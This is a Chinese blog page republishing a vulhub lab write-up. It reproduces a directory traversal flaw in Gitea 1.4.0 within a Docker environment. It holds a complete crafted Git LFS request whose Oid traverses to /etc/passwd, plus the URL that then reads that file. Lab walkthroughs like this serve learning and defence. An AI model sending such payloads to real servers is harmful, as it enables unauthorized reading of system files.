| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> vulhub漏洞复现十八_Gitea -> 正文阅读 |
|
[系统运维]vulhub漏洞复现十八_Gitea |
前言 Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。 Gitea 1.4.0 目录穿越导致命令执行漏洞 漏洞原理 1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 环境搭建 192.168.4.10_ubuntu #docker-compose up -d 漏洞利用 环境启动后,访问`http://you-ip:3000`,将进入安装页面,填写管理员账号密码,并修改网站URL,其他的用默认配置安装即可。(不要修改端口号) 安装完成后,访问http://you-ip:3000可见已完成安装,新注册一个用户,登录 创建一个公开的仓库,随便添加点文件进去(比如使用选定的文件和模板初始化仓库): 然后,需要执行一次`docker-compose restart`重启gitea服务。 漏洞利用 构造如下数据包,添加一个Git LFS对象: ``` POST /test/test1.git/info/lfs/objects HTTP/1.1 Host: your-ip:3000 Accept-Encoding: gzip, deflate Accept: application/vnd.git-lfs+json Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 151 { ????"Oid": "....../../../etc/passwd", ????"Size": 1000000, ????"User" : "a", ????"Password" : "a", ????"Repo" : "a", ????"Authorization" : "a" } ``` 然后,访问`http://your-ip:3000/test/test1.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth`,即可看到`/etc/passwd`已被成功读取: ? |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/16 7:23:29- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |